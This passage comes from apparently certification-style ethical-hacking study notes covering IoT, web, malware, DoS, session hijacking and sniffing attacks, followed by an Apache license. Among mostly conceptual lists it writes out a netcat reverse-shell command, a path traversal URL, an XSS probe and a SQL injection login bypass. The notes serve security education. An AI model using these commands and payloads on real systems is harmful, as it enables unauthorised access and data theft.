131 | - **I5 - Privacy Concerns** - due to collection of personal data
132 | - **I6 - Insecure Cloud Interface** - easy-to-guess credentials make enumeration easy
133 | - **I7 - Insecure Mobile Interface** - easy-to-guess credentials on mobile interface
134 | - **I8 - Insufficient Security Configurability** - cannot change security which causes default passwords and configuration
135 | - **I9 - Insecure Software/Firmware** - lack of a device to be updated or devices that do not check for updates
136 | - **I10 - Poor Physical Security** - because of the nature of devices, these can easily be stolen
137 | 
138 | - **Sybil Attack** - uses multiple forged identities to create the illusion of traffic
139 | - **HVAC Attacks** - attacks on HVAC systems
140 | - **Rolling Code** - the ability to jam a key fob's communications, steal the code and then create a subsequent code
141 | - **BlueBorne Attack** - attacks against Bluetooth devices
142 | 
143 | - Other attacks already enumerated in other sections still apply such as MITM, ransomware, side channel
144 | 
145 | ### <u>IoT Hacking Methodology</u>
146 | 
147 | - **Steps**
148 |   - **Information Gathering** - gathering information about the devices; useful resource is Shodan (Google for IoT devices connected to Internet)
149 |     - **Foren6** - IoT traffic sniffer
150 |   - **Vulnerability Scanning** - same as normal methodology - looks for vulnerabilities
151 |     - **Tools**
152 |       - Nmap
153 |       - RIoT Vulnerability Scanner
154 |       - beSTORM
155 |       - IoTsploit
156 |       - IoT Inspector
157 |   - **Launching Attacks**
158 |     - **Tools**
159 |       - Firmalyzer
160 |       - KillerBee
161 |       - JTAGulator
162 |       - Attify
163 |   - **Gaining Access** - same objectives as normal methodology
164 |   - **Maintaining Access** - same objectives as normal methodology
165 | 


--------------------------------------------------------------------------------
/6 - Web-Based Hacking - Servers and Applications.md:
--------------------------------------------------------------------------------
  1 | # Web-Based Hacking - Servers and Applications
  2 | 
  3 | ### <u>Web Organizations</u>
  4 | 
  5 | - **Internet Engineering Task Force** (IETF) - creates engineering documents to help make the Internet work better
  6 | - **World Wide Web Consortium** (W3C) - a standards-developing community
  7 | - **Open Web Application Security Project** (OWASP) - organization focused on improving the security of software
  8 | 
  9 | ### <u>OWASP Web Top 10</u>
 10 | 
 11 | - **A1 - Injection Flaws** - SQL, OS and LDAP injection
 12 | - **A2 - Broken Authentication and Session Management** - functions related to authentication and session management that aren't implemented correctly
 13 | - **A3 - Sensitive Data Exposure** - not properly protecting sensitive data (SSN, CC  numbers, etc.)
 14 | - **A4 - XML External  Entities (XXE)** - exploiting XML  processors by uploading hostile content in an XML document
 15 | - **A5 - Broken Access Control** - having improper controls on areas that should be protected
 16 | - **A6 - Security Misconfiguration** - across all parts of the server and application
 17 | - **A7 - Cross-Site Scripting (XSS)** - taking untrusted data and sending it without input validation
 18 | - **A8 - Insecure Deserialization** - improperly de-serializing data
 19 | - **A9 - Using Components with Known Vulnerabilities** - libraries and frameworks that have known security holes
 20 | - **A10 - Insufficient Logging and Monitoring** - not having enough logging to detect attacks
 21 | 
 22 | **WebGoat** - project maintained by OWASP which is an insecure web application meant to be tested
 23 | 
 24 | ### <u>Web Server Attack Methodology</u>
 25 | 
 26 | - **Information Gathering** - Internet searches, whois, reviewing robots.txt
 27 | - **Web  Server Footprinting** - banner grabbing
 28 |   - **Tools**
 29 |     - Netcraft
 30 |     - HTTPRecon
 31 |     - ID Serve
 32 |     - HTTPrint
 33 |     - nmap
 34 |       - nmap --script http-trace -p80 localhost (detects vulnerable TRACE method)
 35 |       - nmap --script http-google-email <host> (lists email addresses)
 36 |       - nmap --script hostmap-* <host> (discovers virtual hosts on the IP address you are trying to footprint; * is replaced by online db such as  IP2Hosts)
 37 |       - nmap --script http-enum -p80 <host> (enumerates common web  apps)
 38 |       - nmap -p80 --script http-robots.txt <host> (grabs the robots.txt file)
 39 | - **Website Mirroring** - brings the site to your own machine to examine structure, etc.
 40 |   - **Tools**
 41 |     - Wget
 42 |     - BlackWidow
 43 |     - HTTrack
 44 |     - WebCopier Pro
 45 |     - Web Ripper
 46 |     - SurfOffline
 47 | - **Vulnerability Scanning** - scans web server for vulnerabilities
 48 |   - **Tools**
 49 |     - Nessus
 50 |     - Nikto - specifically suited for web servers; still very noisy like Nessus
 51 | - **Session Hijacking**
 52 | - **Web Server Password Cracking**
 53 | 
 54 | ### <u>Web Server Architecture</u>
 55 | 
 56 | - **Most Popular Servers** - Apache, IIS and Nginx
 57 | - Apache runs configurations as a part of a module within special files (http.conf, etc.)
 58 | - IIS runs all applications in the context of LOCAL_SYSTEM
 59 | - IIS 5 had a ton of bugs - easy to get into
 60 | - **N-Tier Architecture** - distributes processes across multiple servers; normally as three-tier: Presentation (web), logic (application) and data (database)
 61 | - **Error Reporting** - should not be showing errors in production; easy to glean information
 62 | - **HTML** - markup language used to display web pages
 63 | - **HTTP Request Methods**
 64 |   - **GET** - retrieves whatever information is in the URL; sending data is done in URL
 65 |   - **HEAD** - identical to get except for no body return
 66 |   - **POST** - sends data via body - data not shown in URL or in history
 67 |   - **PUT** - requests data be stored at the URL
 68 |   - **DELETE** - requests origin server delete resource
 69 |   - **TRACE** - requests application layer loopback of message
 70 |   - **CONNECT** - reserved for use with proxy
 71 |   - Both POST and GET can be manipulated by a web proxy
 72 | - **HTTP Error Messages**
 73 |   - **1xx: Informational** - request received, continuing
 74 |   - **2xx: Success** - action received, understood and accepted
 75 |   - **3xx: Redirection** - further action must be taken
 76 |   - **4xx: Client Error** - request contains bad syntax or cannot be fulfilled
 77 |   - **5xx: Server Error** - server failed to fulfill an apparently valid request
 78 | 
 79 | ### <u>Web Server Attacks</u>
 80 | 
 81 | - **DNS Amplification** - uses recursive DNS to DoS a target; amplifies DNS answers to target until it can't do anything
 82 | - **Directory Transversal** (../ or dot-dot-slash) - requests file that should not be accessible from web server
 83 |   - Example: http://www.example.com/../../../../etc/password
 84 |   - Can use Unicode to possibly evade IDS - %2e for dot and %sf for slash
 85 | - **Parameter Tampering** (URL Tampering) - manipulating parameters within URL to achieve escalation or other changes
 86 | - **Hidden Field Tampering** - modifying hidden form fields producing unintended results
 87 | - **Web Cache Poisoning** - replacing the cache on a box with a malicious version of it
 88 | - **WFETCH** - Microsoft tool that allows you to craft HTTP requests to see response data
 89 | - **Misconfiguration Attack** - same as before - improper configuration of a web server
 90 | - **Password Attack** - attempting to crack passwords related to web resources
 91 | - **Connection String Parameter Pollution** - injection attack that uses semicolons to take advantage of databases that use this separation method
 92 | - **Web Defacement** - simply modifying a web page to say something else
 93 | - **Tools**
 94 |   - **Brutus** - brute force web passwords of HTTP
 95 |   - **Hydra** - network login cracker
 96 |   - **Metasploit**
 97 |     - Basic working is Libraries use Interfaces and Modules to send attacks to services
 98 |     - **Exploits** hold the actual exploit
 99 |     - **Payload** contains the arbitrary code if exploit is successful
100 |     - **Auxiliary** used for one-off actions (like a scan)
101 |     - **NOPS** used for buffer-overflow type operations
102 | - **Shellshock** - causes Bash to unintentionally execute commands when commands are concatenated on the end of function definitions
103 | 
104 | ### <u>Web Application Attacks</u>
105 | 
106 | - Most often hacked before of inherent weaknesses built into the program
107 | - First step is to identify entry points (POST data, URL parameters, cookies, headers, etc.)
108 | - **Tools for Identifying Entry Points**
109 |   - WebScarab
110 |   - HTTPPrint
111 |   - BurpSuite
112 | - **Web 2.0** - dynamic applications; have a larger attack surface due to simultaneous communication
113 | - **File Injection** - attacker injects a pointer in a web form to an exploit hosted elsewhere
114 | - **Command Injection** - attacker gains shell access using Java or similar
115 | - **LDAP Injection** - exploits applications that construct LDAP statements
116 |   - Format for LDAP injection includes )(&)
117 | - **SOAP Injection** - inject query strings in order to bypass authentication
118 |   - SOAP uses XML to format information
119 |   - Messages are "one way" in nature
120 | - **Buffer Overflow** (Smashing the stack) - attempts to write data into application's buffer area to overwrite adjacent memory, execute code or crash a system
121 |   - Inputs more data than the buffer is allowed
122 |   - Includes stack, heap, NOP sleds and more
123 |   - **Canaries** - systems can monitor these - if they are changed, they indicate a buffer overflow has occurred; placed between buffer and control data
124 | - **XSS** (Cross-site scripting) - inputting JavaScript into a web form that alters what the page does
125 |   - Can also be passed via URL (http://IPADDRESS/";!--"<XSS>=&{()}
126 |   - Can be malicious by accessing cookies and sending them to a remote host
127 |   - Can be mitigated by setting **HttpOnly** flag for cookies
128 |   - **Stored XSS** (Persistent or Type-I) - stores the XSS in a forum or like for multiple people to access
129 | - **Cross-Site Request Forgery** (CSRF) - forces an end user to execute unwanted actions on an app they're already authenticated on
130 |   - Inherits  identity and privileges of victim to perform an undesired function on victim's behalf
131 |   - Captures the session and sends a request based off the logged in user's credentials
132 |   - Can be mitigated by sending **random challenge tokens**
133 | - **Session Fixation** - attacker logs into a legitimate site and pulls a session ID; sends link with session ID to victim.  Once victim logs in, attacker can now log in and run with user's credentials
134 | - **Cookies** - small text-based files stored that contains information like preferences, session details or shopping cart contents
135 |   - Can be manipulated to change functionality (e.g. changing a cooking that says "ADMIN=no" to "yes")
136 |   - Sometimes, but rarely, can also contain passwords
137 | - **SQL Injection** - injecting SQL commands into input fields to produce output
138 |   - Data Handling - Definition (DDL), manipulation (DML) and control (DCL)
139 |   - Example - input "' OR 1 = 1 --" into a login field - basically tells the server if 1 = 1 (always true) to allow the login.
140 |   - Double dash (--) tells the server to ignore the rest of the query (in this example, the password check)
141 |   - Basic test to see if SQL injection is possible is just inserting a single quote (')
142 |   - **Fuzzing** - inputting random data into a target to see what will happen
143 |   - **Tautology** - using always true statements to test SQL (e.g. 1=1)
144 |   - **In-band SQL injection** - uses same communication channel to perform attack
145 |     - Usually is when data pulled can fit into data exported (where data goes to a web table)
146 |     - Best for using UNION queries
147 |   - **Out-of-band SQL injection** - uses different communication channels (e.g. export results to file on web server)
148 |   - **Blind/inferential** - error messages and screen returns don't occur; usually have to guess whether command work or use timing to know
149 |   - **Tools**
150 |     - Sqlmap
151 |     - sqlninja
152 |     - Havij
153 |     - SQLBrute
154 |     - Pangolin
155 |     - SQLExec
156 |     - Absinthe
157 |     - BobCat
158 | - **HTTP Response Splitting** - adds header response data to an input field so server splits the response
159 |   - Can be used to redirect a user to a malicious site
160 |   - Is not an attack in and of itself - must be combined with another attack
161 | - **Countermeasures** - input scrubbing for injection, SQL parameterization for SQL injection, keeping patched servers, turning off unnecessary services, ports and protocols
162 | 


--------------------------------------------------------------------------------
/10 - Trojans and Other Attacks.md:
--------------------------------------------------------------------------------
  1 | # Trojans and Other Attacks
  2 | 
  3 | ### <u>Malware Basics</u>
  4 | 
  5 | - **Malware** - software designed to harm or secretly access a computer system without informed consent
  6 | - Most is downloaded from the Internet with or without the user's knowledge
  7 | - **Overt Channels** - legitimate communication channels used by programs
  8 | - **Covert Channels** - used to transport data in unintended ways
  9 | - **Wrappers** - programs that allow you to bind an executable to an innocent file
 10 | - **Crypters** - use a combination of encryption and code manipulation to render malware undetectable to security programs
 11 | - **Packers** - use compression to pack the executable which helps evage signature based detection
 12 | - **Exploit Kits** - help deliver exploits and payloads
 13 |   - Infinity
 14 |   - Bleeding Life
 15 |   - Crimepack
 16 |   - Blackhole Exploit Kit
 17 | 
 18 | ### <u>Trojans</u>
 19 | 
 20 | - **Trojans** - software that appears to perform a desirable function but instead performs malicious activity
 21 |   - To hackers, it is a method to gain and maintain access to a system
 22 |   - Trojans are means of delivery whereas a backdoor provides the open access
 23 | - **Types**
 24 |   - **Defacement trojan**
 25 |   - **Proxy server trojan**
 26 |   - **Botnet trojan**
 27 |     - Chewbacca
 28 |     - Skynet
 29 |   - **Remote access trojans**
 30 |     - RAT
 31 |     - MoSucker
 32 |     - Optix Pro
 33 |     - Blackhole
 34 |   - **E-banking trojans**
 35 |   	- Zeus
 36 |   	- Spyeye
 37 |   - **Command Shell Trojan** - Provides a backdoor to connect to through command-line access
 38 |     - Netcat
 39 | - **Covert Channel Tunneling Trojan** (CCTT) - a RAT trojan; creates data transfer channels in previously authorized data streams
 40 | - **Netcat**
 41 |   - "Swiss army knife" of tcp/ip hacking
 42 |   - Provides all sorts of control over a remote shell on a target
 43 |   - Connects via **nc -e IPaddress Port#**
 44 |   - From attack machine **nc -l -p 5555** opens a listening port on 5555
 45 |   - Can connect over TCP or UDP, from any port
 46 |   - Offers DNS forwarding, port mapping and forwarding and proxying
 47 | - **Trojan Port Numbers**
 48 | 
 49 | | Trojan Name        | Port   |
 50 | |--------------------|--------|
 51 | | Death              | 2      |
 52 | | Senna Spy          | 20     |
 53 | | Hackers Paradise   | 31,456 |
 54 | | TCP Wrappers       | 421    |
 55 | | Doom, Santaz Back  | 666    |
 56 | | Silencer, WebEx    | 1001   |
 57 | | RAT                | 1095-98|
 58 | | SubSeven           | 1243   |
 59 | | Shiva-Burka        | 1600   |
 60 | | Trojan Cow         | 2001   |
 61 | | Deep Throat        | 6670-71|
 62 | | Tini               | 7777   |
 63 | | NetBus             | 12345-6|
 64 | | Whack a Mole       | 12361-3|
 65 | | Back Orifice       | 31337,8|
 66 | 
 67 | - **netstat -an** - shows open ports in numerical order
 68 | - **netstat -b** - displays all active connections and the processes using them
 69 | - **Process Explorer** - Microsoft tool that shows you everything about running processes
 70 | - **Registry Monitoring Tools**
 71 |   - SysAnalyzer
 72 |   - Tiny Watcher
 73 |   - Active Registry Monitor
 74 |   - Regshot
 75 | - **Msconfig** - Windows program that shows all programs set to start on startup
 76 | - **Tripwire** - integrity verifier that can act as a HIDS in protection against trojans
 77 | - **SIGVERIF** - build into Windows to verify the integrity of the system
 78 |   - Log  file can be found at c:\windows\system32\sigverif.txt
 79 |   - Look for drivers that are not signed
 80 | 
 81 | ### <u>Viruses and Worms</u>
 82 | 
 83 | - **Virus** - self-replicating program that reproduces by attaching copies of itself into other executable code
 84 |   - Usually installed by user clicking on malicious file attachments or downloads
 85 |   - **Fake Antivirus** - tries to convince a user has a virus and have them download an AV that is a virus itself
 86 | - **Ransomware** - malicious software designed to deny access to a computer until a price is paid; usually spread through email
 87 |   - **WannaCry** - famous ransomware; within 24 hours had 230,000 victims; exploited unpatched SMB vulnerability
 88 |   - **Other Examples**
 89 |     - Cryptorbit
 90 |     - CryptoLocker
 91 |     - CryptoDefense
 92 |     - police-themed
 93 | - **Other Virus Types**
 94 |   - **Boot Sector Virus** - known as system virus; moves boot sector to another location and then inserts its code int he original location
 95 |   - **Shell Virus** - wraps  around an application's code, inserting itself before the application's
 96 |   - **Cluster Virus** - modifies directory table entries so every time a file or folder is opened, the virus runs
 97 |   - **Multipartite Virus** - attempts to infect both boot sector and files; generally refers to viruses with multiple infection methods
 98 |   - **Macro Virus** - written in VBA; infects template files - mostly Word and Excel
 99 |   - **Polymorphic Code Virus** - mutates its code by using a polymorphic engine; difficult to find because code is always changing
100 |   - **Encryption Virus** - uses  encryption to hide the code from antivirus
101 |   - **Metamorphic Virus** - rewrites itself every time it infects a new file
102 |   - **Stealth Virus** - known as a tunneling virus; attempts to evade AVs by intercepting their requests and returning them instead of letting them pass to the OS
103 |   - **Cavity Virus** - overwrite portions of host files as to not increase the actual size of the file; uses null content sections
104 |   - **Sparse Infector Virus** - only infects occasionally (e.g. every 10th time)
105 |   - **File Extension Virus** - changes the file extensions of files to take advantage of most people having them turned off (readme.txt.vbs shows as readme.txt)
106 | - **Virus Makers**
107 |   - Sonic Bat
108 |   - PoisonVirus Maker
109 |   - Sam's Virus Generator
110 |   - JPS Virus Maker
111 | - **Worm** - self-replicating malware that sends itself to other computers without human intervention
112 |   - Usually doesn't infect files - just resides in active memory
113 |   - Often used in botnets
114 | - **Ghost Eye Worm** - hacking tool that uses random messaging on Facebook and other sites to perform a host of malicious efforts
115 | 
116 | ### <u>Analyzing Malware</u>
117 | 
118 | - **Steps**
119 |   1. Make sure you have a good test bed
120 |      - Use a VM with NIC in host-only mode and no open shares
121 |   2. Analyze the malware on the isolated VM in a static state
122 |      - Tools - binText and UPX help with looking at binary
123 |   3. Run the malware and check out processes
124 |      - Use Process Monitor, etc. to look at processes
125 |      - Use NetResident, TCPview or even Wireshark to look at network activity
126 |   4. Check and see what files were added, changed, or deleted
127 |      - Tools - IDA Pro, VirusTotal, Anubis, Threat Analyzer
128 | - **Preventing Malware**
129 |   - Make sure you know what is going on in your system
130 |   - Have a good antivirus that is up to date
131 |   - **Sheepdip** - system that is used to check things introduced into a network
132 |     - Is airgapped
133 | 
134 | ### <u>Denial of Service Attacks</u>
135 | 
136 | - Seeks to take down a system or deny access to it by authorized users
137 | - **Botnet** - network of zombie computers a hacker uses to start a distributed attack
138 |   - Can be controlled over HTTP, HTTPS, IRC, or ICQ
139 | - **Basic Categories**
140 |   - **Fragmentation attacks** - attacks take advantage of the system's ability to reconstruct fragmented packets
141 |   - **Volumetric attacks** - bandwidth attacks; consume all bandwidth for the system or service
142 |   - **Application attacks** - consume the resources necessary for the application to run
143 |     - Note - application level attakcs are against weak code; application attacks are just the general term
144 |   - **TCP state-exhaustion attacks** - go after load balancers, firewalls and application servers
145 |   - **SYN attack** - sends thousands of SYN packets to the machine with a false source address; eventually engages all resources and exhausts the machine
146 |   - **SYN flood** - sends thousands of SYN packets; does not spoof IP but doesn't respond to the SYN/ACK packets; eventually bogs down the computer, runs out of resources
147 |   - **ICMP flood** - sends ICMP Echo packets with a spoofed address; eventually reaches limit of packets per second sent
148 |   - **Smurf** - large number of pings to the broadcast address of the subnet with source IP spoofed as the target; entire subnet responds exhausting the target
149 |   - **Fraggle** - same as smurf but with UDP packets
150 |   - **Ping of Death** - fragments ICMP messages; after reassembled, the ICMP packet is larger than the maximum size and crashes the system
151 |   - **Teardrop** - overlaps a large number of garbled IP fragments with oversized payloads; causes older systems to crash due to fragment reassembly
152 |   - **Peer to peer** - clients of peer-to-peer file-sharing hub are disconnected and directed to connect to the target system
153 |   - **Phlashing** - a DoS attack that causes permanent damage to a system; also called bricking a system
154 |   - **LAND attack** - sends a SYN packet to the target with a spoofed IP the same as the target; if vulnerable, target loops endlessly and crashes
155 | - **Low Orbit Ion Cannon** (LOIC) - DDoS tool that floods a target with TCP, UDP or HTTP requests
156 | - **Other Tools**
157 |   - Trinity - Linux based DDoS tool
158 |   - Tribe Flood Network - uses voluntary botnet systems to launch massive flood attacks
159 |   - R-U-Dead-Yet (RUDY) - DoS with HTTP POST via long-form field submissions
160 | 
161 | ### <u>Session Hijacking</u>
162 | 
163 | - Attacker waits for a session to begin and after the victim authenticates, steals the session for himself
164 | - **Steps**
165 |   1. Sniff the traffic between the client and server
166 |   2. Monitor the traffic and predict the sequence numbering
167 |   3. Desynchronize the session with the client
168 |   4. Predict the session token and take over the session
169 |   5. Inject packets to the target server
170 | - Can be done via brute force, calculation or stealing
171 | - Predicting can be done by knowing the window size and the packet sequence number
172 | - Sequence numbers increment on **acknowledgement**
173 |   - For example, an acknowledgement of 105 with a window of 200 means you could expect sequence numbering from 105 to 305
174 | - **Tools**
175 |   - **Ettercap** - man-in-the-middel tool and packet sniffer on steroids
176 |   - **Hunt** - sniff, hijack and reset connections
177 |   - **T-Sight** - easily hijack sessions and monitor network connections
178 |   - **Zaproxy**
179 |   - **Paros**
180 |   - **Burp Suite**
181 |   - **Juggernaut**
182 |   - **Hamster**
183 |   - **Ferret**
184 | - **Countermeasures**
185 |   - Using unpredictable session IDs
186 |   - Limiting incoming connections
187 |   - Minimizing remote access
188 |   - Regenerating the session key after authentication
189 |   - Use IPSec to encrypt
190 | - **IPSec**
191 |   - **Transport Mode** - payload and ESP trailer are encrypted; IP header is not
192 |   - **Tunnel mode** - everything is encrypted; cannot be used with NAT
193 |   - **Architecture Protocols**
194 |     - **Authentication Header** - guarantees the integrity and authentication of IP packet sender
195 |     - **Encapsulating Security Payload** (ESP) - provides origin authenticity and integrity as well as confidentiality
196 |     - **Internet Key Exchange** (IKE) - produces the keys for the encryption process
197 |     - **Oakley** - uses Diffie-Hellman to create master and session keys
198 |     - ** Internet Security Association Key Management Protocol** (ISAKMP) - software that facilitates encrypted communication between two endpoints
199 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                                  Apache License
  2 |                            Version 2.0, January 2004
  3 |                         http://www.apache.org/licenses/
  4 | 
  5 |    TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
  6 | 
  7 |    1. Definitions.
  8 | 
  9 |       "License" shall mean the terms and conditions for use, reproduction,
 10 |       and distribution as defined by Sections 1 through 9 of this document.
 11 | 
 12 |       "Licensor" shall mean the copyright owner or entity authorized by
 13 |       the copyright owner that is granting the License.
 14 | 
 15 |       "Legal Entity" shall mean the union of the acting entity and all
 16 |       other entities that control, are controlled by, or are under common
 17 |       control with that entity. For the purposes of this definition,
 18 |       "control" means (i) the power, direct or indirect, to cause the
 19 |       direction or management of such entity, whether by contract or
 20 |       otherwise, or (ii) ownership of fifty percent (50%) or more of the
 21 |       outstanding shares, or (iii) beneficial ownership of such entity.
 22 | 
 23 |       "You" (or "Your") shall mean an individual or Legal Entity
 24 |       exercising permissions granted by this License.
 25 | 
 26 |       "Source" form shall mean the preferred form for making modifications,
 27 |       including but not limited to software source code, documentation
 28 |       source, and configuration files.
 29 | 
 30 |       "Object" form shall mean any form resulting from mechanical
 31 |       transformation or translation of a Source form, including but
 32 |       not limited to compiled object code, generated documentation,
 33 |       and conversions to other media types.
 34 | 
 35 |       "Work" shall mean the work of authorship, whether in Source or
 36 |       Object form, made available under the License, as indicated by a
 37 |       copyright notice that is included in or attached to the work
 38 |       (an example is provided in the Appendix below).
 39 | 
 40 |       "Derivative Works" shall mean any work, whether in Source or Object
 41 |       form, that is based on (or derived from) the Work and for which the
 42 |       editorial revisions, annotations, elaborations, or other modifications
 43 |       represent, as a whole, an original work of authorship. For the purposes
 44 |       of this License, Derivative Works shall not include works that remain
 45 |       separable from, or merely link (or bind by name) to the interfaces of,
 46 |       the Work and Derivative Works thereof.
 47 | 
 48 |       "Contribution" shall mean any work of authorship, including
 49 |       the original version of the Work and any modifications or additions
 50 |       to that Work or Derivative Works thereof, that is intentionally
 51 |       submitted to Licensor for inclusion in the Work by the copyright owner
 52 |       or by an individual or Legal Entity authorized to submit on behalf of
 53 |       the copyright owner. For the purposes of this definition, "submitted"
 54 |       means any form of electronic, verbal, or written communication sent
 55 |       to the Licensor or its representatives, including but not limited to
 56 |       communication on electronic mailing lists, source code control systems,
 57 |       and issue tracking systems that are managed by, or on behalf of, the
 58 |       Licensor for the purpose of discussing and improving the Work, but
 59 |       excluding communication that is conspicuously marked or otherwise
 60 |       designated in writing by the copyright owner as "Not a Contribution."
 61 | 
 62 |       "Contributor" shall mean Licensor and any individual or Legal Entity
 63 |       on behalf of whom a Contribution has been received by Licensor and
 64 |       subsequently incorporated within the Work.
 65 | 
 66 |    2. Grant of Copyright License. Subject to the terms and conditions of
 67 |       this License, each Contributor hereby grants to You a perpetual,
 68 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 69 |       copyright license to reproduce, prepare Derivative Works of,
 70 |       publicly display, publicly perform, sublicense, and distribute the
 71 |       Work and such Derivative Works in Source or Object form.
 72 | 
 73 |    3. Grant of Patent License. Subject to the terms and conditions of
 74 |       this License, each Contributor hereby grants to You a perpetual,
 75 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 76 |       (except as stated in this section) patent license to make, have made,
 77 |       use, offer to sell, sell, import, and otherwise transfer the Work,
 78 |       where such license applies only to those patent claims licensable
 79 |       by such Contributor that are necessarily infringed by their
 80 |       Contribution(s) alone or by combination of their Contribution(s)
 81 |       with the Work to which such Contribution(s) was submitted. If You
 82 |       institute patent litigation against any entity (including a
 83 |       cross-claim or counterclaim in a lawsuit) alleging that the Work
 84 |       or a Contribution incorporated within the Work constitutes direct
 85 |       or contributory patent infringement, then any patent licenses
 86 |       granted to You under this License for that Work shall terminate
 87 |       as of the date such litigation is filed.
 88 | 
 89 |    4. Redistribution. You may reproduce and distribute copies of the
 90 |       Work or Derivative Works thereof in any medium, with or without
 91 |       modifications, and in Source or Object form, provided that You
 92 |       meet the following conditions:
 93 | 
 94 |       (a) You must give any other recipients of the Work or
 95 |           Derivative Works a copy of this License; and
 96 | 
 97 |       (b) You must cause any modified files to carry prominent notices
 98 |           stating that You changed the files; and
 99 | 
100 |       (c) You must retain, in the Source form of any Derivative Works
101 |           that You distribute, all copyright, patent, trademark, and
102 |           attribution notices from the Source form of the Work,
103 |           excluding those notices that do not pertain to any part of
104 |           the Derivative Works; and
105 | 
106 |       (d) If the Work includes a "NOTICE" text file as part of its
107 |           distribution, then any Derivative Works that You distribute must
108 |           include a readable copy of the attribution notices contained
109 |           within such NOTICE file, excluding those notices that do not
110 |           pertain to any part of the Derivative Works, in at least one
111 |           of the following places: within a NOTICE text file distributed
112 |           as part of the Derivative Works; within the Source form or
113 |           documentation, if provided along with the Derivative Works; or,
114 |           within a display generated by the Derivative Works, if and
115 |           wherever such third-party notices normally appear. The contents
116 |           of the NOTICE file are for informational purposes only and
117 |           do not modify the License. You may add Your own attribution
118 |           notices within Derivative Works that You distribute, alongside
119 |           or as an addendum to the NOTICE text from the Work, provided
120 |           that such additional attribution notices cannot be construed
121 |           as modifying the License.
122 | 
123 |       You may add Your own copyright statement to Your modifications and
124 |       may provide additional or different license terms and conditions
125 |       for use, reproduction, or distribution of Your modifications, or
126 |       for any such Derivative Works as a whole, provided Your use,
127 |       reproduction, and distribution of the Work otherwise complies with
128 |       the conditions stated in this License.
129 | 
130 |    5. Submission of Contributions. Unless You explicitly state otherwise,
131 |       any Contribution intentionally submitted for inclusion in the Work
132 |       by You to the Licensor shall be under the terms and conditions of
133 |       this License, without any additional terms or conditions.
134 |       Notwithstanding the above, nothing herein shall supersede or modify
135 |       the terms of any separate license agreement you may have executed
136 |       with Licensor regarding such Contributions.
137 | 
138 |    6. Trademarks. This License does not grant permission to use the trade
139 |       names, trademarks, service marks, or product names of the Licensor,
140 |       except as required for reasonable and customary use in describing the
141 |       origin of the Work and reproducing the content of the NOTICE file.
142 | 
143 |    7. Disclaimer of Warranty. Unless required by applicable law or
144 |       agreed to in writing, Licensor provides the Work (and each
145 |       Contributor provides its Contributions) on an "AS IS" BASIS,
146 |       WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 |       implied, including, without limitation, any warranties or conditions
148 |       of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 |       PARTICULAR PURPOSE. You are solely responsible for determining the
150 |       appropriateness of using or redistributing the Work and assume any
151 |       risks associated with Your exercise of permissions under this License.
152 | 
153 |    8. Limitation of Liability. In no event and under no legal theory,
154 |       whether in tort (including negligence), contract, or otherwise,
155 |       unless required by applicable law (such as deliberate and grossly
156 |       negligent acts) or agreed to in writing, shall any Contributor be
157 |       liable to You for damages, including any direct, indirect, special,
158 |       incidental, or consequential damages of any character arising as a
159 |       result of this License or out of the use or inability to use the
160 |       Work (including but not limited to damages for loss of goodwill,
161 |       work stoppage, computer failure or malfunction, or any and all
162 |       other commercial damages or losses), even if such Contributor
163 |       has been advised of the possibility of such damages.
164 | 
165 |    9. Accepting Warranty or Additional Liability. While redistributing
166 |       the Work or Derivative Works thereof, You may choose to offer,
167 |       and charge a fee for, acceptance of support, warranty, indemnity,
168 |       or other liability obligations and/or rights consistent with this
169 |       License. However, in accepting such obligations, You may act only
170 |       on Your own behalf and on Your sole responsibility, not on behalf
171 |       of any other Contributor, and only if You agree to indemnify,
172 |       defend, and hold each Contributor harmless for any liability
173 |       incurred by, or claims asserted against, such Contributor by reason
174 |       of your accepting any such warranty or additional liability.
175 | 
176 |    END OF TERMS AND CONDITIONS
177 | 
178 |    APPENDIX: How to apply the Apache License to your work.
179 | 
180 |       To apply the Apache License to your work, attach the following
181 |       boilerplate notice, with the fields enclosed by brackets "[]"
182 |       replaced with your own identifying information. (Don't include
183 |       the brackets!)  The text should be enclosed in the appropriate
184 |       comment syntax for the file format. We also recommend that a
185 |       file or class name and description of purpose be included on the
186 |       same "printed page" as the copyright notice for easier
187 |       identification within third-party archives.
188 | 
189 |    Copyright [yyyy] [name of copyright owner]
190 | 
191 |    Licensed under the Apache License, Version 2.0 (the "License");
192 |    you may not use this file except in compliance with the License.
193 |    You may obtain a copy of the License at
194 | 
195 |        http://www.apache.org/licenses/LICENSE-2.0
196 | 
197 |    Unless required by applicable law or agreed to in writing, software
198 |    distributed under the License is distributed on an "AS IS" BASIS,
199 |    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 |    See the License for the specific language governing permissions and
201 |    limitations under the License.
202 | 


--------------------------------------------------------------------------------
/4 - Sniffing and Evasion.md:
--------------------------------------------------------------------------------
  1 | # Sniffing and Evasion
  2 | 
  3 | ### <u>Basic Knowledge</u>
  4 | 
  5 |  - Sniffing is capturing packets as they pass on the wire to review for interesting information
  6 |  - **MAC**  (Media Access Control) - physical or burned-in address - assigned to NIC for communications at the Data Link layer
  7 |     - 48 bits long
  8 |     - Displayed as 12 hex characters separated by colons
  9 |     - First half of address is the **organizationally unique identifier** - identifies manufacturer
 10 |     - Second half ensures no two cards on a subnet will have the same address
 11 |  - NICs normally only process signals meant for it
 12 |  - **Promiscuous mode** - NIC must be in this setting to look at all frames passing on the wire
 13 |  - **CSMA/CD** - Carrier Sense Multiple Access/Collision Detection - used over Ethernet to decide who can talk
 14 |  - **Collision Domains**
 15 |     - Traffic from your NIC (regardless of mode) can only be seen within the same collision domain
 16 |     - Hubs by default have one collision domain
 17 |     - Switches have a collision domain for each port
 18 | 
 19 | ### <u>Protocols Susceptible</u>
 20 | 
 21 | - SMTP is sent in plain text and is viewable over the wire.  SMTP v3 limits the information you can get, but you can still see it.
 22 | - FTP sends user ID and password in clear text
 23 | - TFTP passes everything in clear text
 24 | - IMAP, POP3, NNTP and HTTP all  send over clear text data
 25 | - TCP shows sequence numbers (usable in session hijacking)
 26 | - TCP and UCP show open ports
 27 | - IP shows source and destination addresses
 28 | 
 29 | ### <u>ARP</u>
 30 | 
 31 | - Stands for Address Resolution Protocol
